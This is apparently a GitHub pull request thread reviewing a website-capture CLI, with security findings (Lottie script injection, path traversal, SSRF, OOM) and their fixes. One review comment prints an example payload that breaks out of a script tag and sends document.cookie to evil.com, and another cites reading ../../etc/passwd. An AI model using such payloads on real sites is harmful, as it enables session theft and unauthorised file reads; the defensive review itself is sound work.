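A minimal sketch of such a check, covering only the cases listed above (scheme, localhost, and literal IPv4 addresses in the named ranges). `isBlockedUrl` is a hypothetical name and this is not the guard that was later added to assetDownloader.ts. Note its limits: it does not resolve DNS, so a hostname such as `internal-service` or a public name that resolves to a private address passes, and IPv6 is only handled for the loopback literal.

```typescript
// Returns true when the URL should NOT be fetched.
function isBlockedUrl(raw: string): boolean {
  let url: URL;
  try {
    url = new URL(raw);
  } catch {
    return true; // Unparseable input is rejected outright.
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return true;

  const host = url.hostname.toLowerCase();
  if (host === "localhost" || host.endsWith(".localhost") || host === "[::1]") return true;

  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false; // A hostname, not an IPv4 literal: not checked here.

  const a = Number(m[1]);
  const b = Number(m[2]);
  return (
    a === 10 || // 10.0.0.0/8
    a === 127 || // loopback
    (a === 172 && b >= 16 && b <= 31) || // 172.16.0.0/12
    (a === 192 && b === 168) || // 192.168.0.0/16
    (a === 169 && b === 254) // link-local, includes cloud metadata
  );
}
```

A stricter version would resolve the hostname and apply the same range check to every returned address before connecting.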

miguel-heygen · 2026-04-16T02:50:57Z

+                `<!DOCTYPE html>
+<html><head>
+<script src="https://cdnjs.cloudflare.com/ajax/libs/lottie-web/5.12.2/lottie.min.js"></script>
+<style>*{margin:0;padding:0;background:transparent}#c{width:400px;height:400px}</style>


JS injection via Lottie JSON interpolated into setContent. animJson is raw content fetched from the target website, directly interpolated into a <script> block via template literal (animationData:${animJson}). A crafted Lottie JSON with a nm field containing </script><script>fetch('http://evil.com/'+document.cookie)// would escape the script tag and execute arbitrary code in the Puppeteer page context.

Fix: Load the page shell first via setContent (without the data), then pass the animation data via parameterized page.evaluate() — same pattern used for the htmlExtractor fix.

miguel-heygen · 2026-04-16T02:50:57Z

+      let content = readFileSync(filePath);
+      let contentType = getMimeType(filePath);
+
+      // For composition HTML files: unwrap <template> for standalone rendering


Path traversal — missing guard. The fix applied to snapshot.ts (using relative() + isAbsolute()) was not applied here. A request to ../../etc/passwd would read arbitrary files. The server only listens on 127.0.0.1 on an ephemeral port, so exploitation requires local access — but the pattern is identical to what was already fixed in snapshot.ts.

Fix: Add the same guard after the join() call:

const rel = relative(projectDir, filePath);
if (rel.startsWith('..') || isAbsolute(rel)) { res.writeHead(403); res.end(); return; }

miguel-heygen · 2026-04-16T02:50:57Z

+
+        if (isJsonUrl || isJson) {
+          const buffer = await response.buffer();
+          if (buffer.length < 100 || buffer.length > 5_000_000) return; // Skip tiny or huge


Unbounded response body in Lottie interception. response.buffer() downloads the entire response body into memory before the size check on the next line. A site serving a multi-GB response on a .json URL would OOM before the 5MB guard runs.

Fix: Check Content-Length header first when available:

const cl = parseInt(response.headers()['content-length'] || '0', 10);
if (cl > 5_000_000) return;

miguel-heygen · 2026-04-16T02:50:57Z

+  };
+
+  // Load .env file from repo root if it exists (for GEMINI_API_KEY, etc.)
+  try {


Manual .env parsing is fragile. This hand-rolled parser walks up 5 parent directories looking for .env and modifies process.env as a side effect. It doesn't handle multi-line values, comments after values (KEY=val # comment includes the comment), or escaped quotes. Bun has built-in .env support — if the capture command runs via npx hyperframes capture, bun loads .env automatically. If the manual parser is needed for a specific reason (e.g., output dir differs from repo root), worth documenting that.
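
If the manual parser stays, the inline-comment and quoting cases could be handled roughly as sketched below. `parseEnvLine` is a hypothetical function, it returns a key/value pair instead of mutating `process.env`, and it still does not handle multi-line values or escaped quotes.

```typescript
// Parses one line of a .env file; returns null for blanks, comments, and malformed lines.
function parseEnvLine(line: string): [string, string] | null {
  const trimmed = line.trim();
  if (trimmed === "" || trimmed.startsWith("#")) return null;

  const eq = trimmed.indexOf("=");
  if (eq <= 0) return null;

  const key = trimmed.slice(0, eq).trim();
  let value = trimmed.slice(eq + 1).trim();

  // Quoted value: take everything up to the matching closing quote verbatim.
  const quote = value[0];
  if (quote === '"' || quote === "'") {
    const end = value.indexOf(quote, 1);
    if (end > 0) return [key, value.slice(1, end)];
  }

  // Unquoted value: a "#" preceded by whitespace starts an inline comment.
  const hash = value.search(/\s#/);
  if (hash !== -1) value = value.slice(0, hash).trim();
  return [key, value];
}
```

Returning pairs lets the caller decide whether to write into `process.env`, which keeps the side effect visible at the call site.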

Mechanical extraction, zero logic changes. New files:

- mediaCapture.ts (345 lines): Lottie preview, video manifest/screenshots
- contentExtractor.ts (314 lines): library detection, text, Gemini, asset descriptions
- scaffolding.ts (135 lines): .env loading, project scaffold generation

Also fixes false-positive BLOCKED.md with structural Cloudflare detection. Tested on 20 websites, pre/post output identical.

…gecss) The --split feature auto-generates compositions from captured HTML — a different approach from the /website-to-hyperframes skill workflow where agents build compositions from scratch using the storyboard. No skill file, no step reference, and no test session ever used --split. Removes 923 lines of unused code + purgecss dependency. Backed up to ~/Desktop/capture-split-backup/ for reference.

- assetDownloader: add isPrivateUrl() guard blocking private IP ranges (127.x, 10.x, 172.16-31.x, 192.168.x, 169.254.x), cloud metadata endpoints, localhost, and non-HTTP schemes
- mediaCapture: fix Lottie JSON injection by loading shell HTML first then passing animation data via parameterized page.evaluate()
- index.ts: check Content-Length header before response.buffer() in Lottie network interception to avoid OOM on multi-GB responses

Security (from miguel-heygen review):

- assetDownloader: export isPrivateUrl() SSRF guard
- htmlExtractor: add isPrivateUrl check before CSS fetch
- mediaCapture: add isPrivateUrl check before Lottie fetch
- mediaCapture: fix previewPage leak (try/finally)
- mediaCapture: skip Lottie files > 2MB for preview (CDP limit)
- contentExtractor: skip images > 4MB for Gemini captioning
- index.ts: check Content-Length before response.buffer() (OOM guard)
- snapshot.ts: register error handler before server.listen()

Capture improvements:

- Default timeout 30s to 120s (Shopify needs ~90s for Cloudflare)
- step-6-build: sub-agent dispatch template with explicit rules: pass file PATHS not contents, use local fonts not Google Fonts, verify ../assets/ references after each beat

ularkim · 2026-04-16T13:16:16Z

Review Response — Round 3

Five new commits addressing @miguel-heygen's security review + @jrusso1020's modularity concern:

Security fixes (`48ec6a0`, `44b9cbd`)

SSRF protection: isPrivateUrl() guard now applied to all 3 fetch sites (assetDownloader, htmlExtractor CSS fetch, mediaCapture Lottie fetch). Blocks private IPs (10.x, 172.16-31.x, 192.168.x, 169.254.x), cloud metadata, localhost.
Lottie injection: Parameterized page.evaluate() — animation data passed as function arg, not interpolated into script tag
OOM guard: Content-Length check before response.buffer() in Lottie interception
Preview page leak: try/finally on Lottie preview rendering
File size guards: Skip Lottie > 2MB for preview, skip images > 4MB for Gemini captioning
Server error handler: Registered before listen() in snapshot.ts
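
For readers who have not seen the guard, the SSRF check described above could look roughly like the sketch below. This is not the `isPrivateUrl()` from assetDownloader, whose source is not shown in this thread; `isPrivateUrlSketch` and the `metadata.google.internal` entry are assumptions. It only inspects the URL string: it does not resolve DNS and does not cover IPv6 literals.

```typescript
// Illustrative sketch: returns true when a URL should NOT be fetched.
function isPrivateUrlSketch(rawUrl: string): boolean {
  let url: URL;
  try {
    url = new URL(rawUrl);
  } catch {
    return true; // unparsable input is treated as blocked
  }
  // Non-HTTP schemes (file:, data:, ftp:, ...) are blocked outright.
  if (url.protocol !== "http:" && url.protocol !== "https:") return true;

  const host = url.hostname.toLowerCase();
  if (host === "localhost" || host.endsWith(".localhost")) return true;
  if (host === "metadata.google.internal") return true; // assumed metadata hostname

  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false; // a hostname, not an IPv4 literal
  const a = Number(m[1]);
  const b = Number(m[2]);
  return (
    a === 127 || // loopback
    a === 10 || // 10.0.0.0/8
    (a === 172 && b >= 16 && b <= 31) || // 172.16.0.0/12
    (a === 192 && b === 168) || // 192.168.0.0/16
    (a === 169 && b === 254) // link-local, includes 169.254.169.254 metadata
  );
}
```

Because the check is string-based, a public hostname that resolves to a private address would still pass; closing that gap needs a check on the resolved address as well.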

Modularity (`3b2e1cb`)

Split capture/index.ts from 1,175 → 566 lines:

mediaCapture.ts (345 lines) — Lottie preview, video manifest
contentExtractor.ts (314 lines) — library detection, text, Gemini, asset descriptions
scaffolding.ts (135 lines) — .env loading, project scaffold

Cleanup (`be0f194`)

Removed --split flow entirely (splitter/, verify/, cssPurger.ts, purgecss dep) — 1,052 lines deleted. Not used by the /website-to-hyperframes skill workflow.

Other (`0f3c88d`, `44b9cbd`)

Default timeout 30s → 120s (Shopify needs ~90s for Cloudflare)
Sub-agent dispatch instructions in step-6: pass file PATHS not contents, use local fonts not Google Fonts, verify asset refs after each beat
verify/index.ts typecheck fix + path traversal guard (before deletion)
Step-4 technique count contradiction fixed
Step-6 perspective tilt uses gsap.set() instead of CSS transform
Step-1 reordered: command first, Gemini note after

Re: `adm-zip` (#3 from round 1)

adm-zip was not removed — it's still in packages/cli/package.json:30. The root package.json had patchright and purgecss removed, not adm-zip.

Re: `ANTHROPIC_API_KEY` (#6 from round 2)

Grep confirms zero references to ANTHROPIC_API_KEY in the entire codebase. The @anthropic-ai/sdk dependency was removed earlier in this branch. Not restoring a dead env var.

CI fully green (Build, Format, Lint, Test, Runtime contract, Typecheck all pass).
Tested on 20 websites across 3 rounds.

jrusso1020

looks good!

jrusso1020 · 2026-04-16T16:32:09Z

+If the built CLI isn't available, fall back to:
+
+```bash
+npx tsx packages/cli/src/cli.ts capture <URL> -o captures/<project-name>
+```


slight nit but we probably don't need this here?

Oh yeah, we don't. It was only necessary because the published package didn't have it, haha.

Critical: asset cataloger now runs BEFORE extractHtml which converts img src to data URLs. Framer sites like heykuba.com went from 2 to 78 images.

- networkidle2 instead of networkidle0 (unblocks SPAs with WebSockets)
- Lazy-load wait: scroll to bottom, wait for img.complete
- CSS background-image cataloging for Framer/Webflow
- SVG naming: checks class, id, parent, inner text (not just aria-label)
- Gemini batch 5->20, pause 12s->2s (paid tier: 2000 RPM, ~0.001/img)
- maxOutputTokens 300->500, descriptions sorted captioned-first
- Remove tsx fallback from step-1 (reviewer nit, published CLI has it)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

ularkim · 2026-04-16T17:58:33Z

Latest push (`8af3814`) — Capture quality fixes

Found and fixed a critical ordering bug: extractHtml converts all <img src> to data: URLs (for offline HTML export), and the asset cataloger was running AFTER it — finding only data: URLs and skipping them. Framer sites like heykuba.com went from 2 images → 78 images after moving the catalog before the mutation.

Changes

Catalog before DOM mutation — read-only operations (tokens, catalog, screenshots, text) now run before extractHtml which mutates the DOM
networkidle2 instead of networkidle0 — SPAs with persistent WebSocket connections (like vibecodeapp.com) were timing out, not blocked. networkidle2 treats navigation as finished once no more than 2 network connections remain open for at least 500 ms, so pages that keep a connection alive can still settle
Lazy-load image wait — after scrolling, waits for all img.complete before proceeding (Framer IntersectionObserver support)
CSS background-image cataloging — scans getComputedStyle(el).backgroundImage on divs for Framer/Webflow sites
SVG naming — checks class, id, parent class, inner <text> before falling back to icon-N.svg. NeetCode roadmap is now ngx-graph.svg, FontAwesome icons are fa-twitter.svg, fa-youtube.svg
Gemini batching — batch 5→20, pause 12s→2s (paid tier handles 2000 RPM). 78-image site now captions in ~10s instead of 3 min
maxOutputTokens 300→500 — descriptions were being truncated mid-sentence
Asset descriptions sorted — Gemini-captioned images listed first (richest descriptions), then uncaptioned, then SVGs, then fonts
Removed tsx fallback from step-1 per @jrusso1020's nit
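
The batching numbers above can be sanity-checked with a small sketch. The helper names are hypothetical, and it assumes the pause happens between batches only (none after the last). Under that assumption 78 images at batch size 5 means 16 batches and 15 pauses of 12 s, which is 180 s of waiting; at batch size 20 it is 4 batches and 3 pauses of 2 s, which is 6 s, with request time making up the rest.

```typescript
// Split items into consecutive batches of at most `size` elements.
function chunk<T>(items: readonly T[], size: number): T[][] {
  if (!Number.isInteger(size) || size <= 0) {
    throw new RangeError("size must be a positive integer");
  }
  const out: T[][] = [];
  for (let i = 0; i < items.length; i += size) out.push(items.slice(i, i + size));
  return out;
}

// Total seconds spent sleeping between batches (no pause after the last one).
function totalPauseSeconds(itemCount: number, batchSize: number, pauseSeconds: number): number {
  const batches = Math.ceil(itemCount / batchSize);
  return Math.max(0, batches - 1) * pauseSeconds;
}

// Run `worker` over every item, one batch at a time, pausing between batches.
async function runInBatches<T, R>(
  items: readonly T[],
  batchSize: number,
  pauseMs: number,
  worker: (item: T) => Promise<R>,
): Promise<R[]> {
  const results: R[] = [];
  const batches = chunk(items, batchSize);
  for (let i = 0; i < batches.length; i++) {
    // Items inside one batch run concurrently.
    results.push(...(await Promise.all(batches[i].map((item) => worker(item)))));
    if (i < batches.length - 1) {
      await new Promise<void>((done) => setTimeout(done, pauseMs));
    }
  }
  return results;
}
```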

Tested on neetcode.io (26 images cataloged, SVGs named correctly), heykuba.com (2→78 images), vibecodeapp.com (was timing out, now captures in ~15s).

ukimsanov and others added 29 commits April 15, 2026 14:04

refactor(cli): simplify capture pipeline, remove replica generator

5ac5ca9

refactor(capture): remove AI auto-generation and SDK dependencies

3b07dc2

fix(capture): convert extracted colors to HEX format

b6c8ec0

refactor(capture): remove AI key path, add asset descriptions generator

98967be

refactor(capture): update agent prompt, remove hasDesignMd, add asset descriptions

4c0e131

feat(capture): pre-wire shader transitions in index.html scaffold

2abeafc

chore: remove duplicate visual-styles.md (canonical is in hyperframes/)

26f47b5

refactor(skill): rewrite website-to-hyperframes as phase-based orchestrator

5ad7eae

feat(skill): add Phase 1 understand reference

b74bcaa

feat(skill): add Phase 2 design reference with full DESIGN.md schema

78589d4

feat(skill): add Phase 3 creative direction reference

67c96d8

feat(skill): add Phase 4 build reference with inline shader example

56b0b5d

feat(skill): upgrade Visual Identity Gate to produce full DESIGN.md

179f1e3

docs: update CLAUDE.md skill references for phase-based workflow

0795530

fix(cli): add capture command to help groups

4e5d8d1

The capture command was registered in cli.ts but missing from the help groups, so it wouldn't appear in `hyperframes --help`. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

style: format skill reference files (oxfmt)

fff79b7

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

ularkim requested a review from jrusso1020 April 15, 2026 18:20

vanceingalls reviewed Apr 15, 2026

ularkim requested review from jrusso1020 and vanceingalls April 16, 2026 01:44

vanceingalls approved these changes Apr 16, 2026

jrusso1020 reviewed Apr 16, 2026

miguel-heygen reviewed Apr 16, 2026

ukimsanov added 4 commits April 15, 2026 23:19

miguel-heygen approved these changes Apr 16, 2026

ularkim requested review from jrusso1020, miguel-heygen and vanceingalls April 16, 2026 13:42

jrusso1020 approved these changes Apr 16, 2026

jrusso1020 merged commit 87f4c77 into main Apr 16, 2026
20 checks passed

jrusso1020 deleted the feat/website-capture-design-md branch April 16, 2026 19:03

		- Kokoro (offline last resort — has Python dependency issues on many systems) — `npx hyperframes tts SCRIPT.md --voice af_nova --output narration.wav`. Only try this if ElevenLabs and HeyGen are unavailable.

		Pick the voice that sounds most natural and conversational. Listen for pacing — does it breathe between sentences? Does it sound like a person or a robot?
